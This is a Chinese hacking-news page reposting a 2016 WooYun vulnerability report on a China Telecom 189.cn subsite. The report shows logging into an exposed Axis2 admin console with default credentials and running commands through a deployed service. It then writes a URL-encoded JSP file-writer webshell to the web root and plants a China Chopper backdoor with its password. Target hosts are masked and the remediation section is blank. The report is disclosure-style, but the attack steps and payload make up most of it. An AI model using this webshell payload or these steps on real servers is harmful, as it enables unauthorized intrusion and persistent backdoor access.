记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国电信189.cn某分站运维不当导致getshell

2016-06-10 22:35

http://**.**.**.**:8081/axis2/axis2-admin/login admin axis2

因为端口的原因 这里需要改包,可以用burp替换 登陆成功getshell



http://**.**.**.**:8081/axis2/services/Cat/exec?cmd=whoami



http://**.**.**.**:8081/point/f.jsp f



写小马

http://**.**.**.**:8081/axis2/services/Cat/writeStringToFile?data=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%**.**.**.**.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E&file=/opt/Order-Web/webapps/axis2/q2.jsp&encoding=utf-8&append=false



然后写菜刀马

http://**.**.**.**:8081/axis2/test.jsp 密码:f

漏洞证明:

屏幕快照 2016-04-22 下午6.29.55.png



屏幕快照 2016-04-22 下午6.31.06.png



屏幕快照 2016-04-22 下午6.31.21.png



屏幕快照 2016-04-22 下午6.31.57.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0199392

阅读:345377 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“中国电信189.cn某分站运维不当导致getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云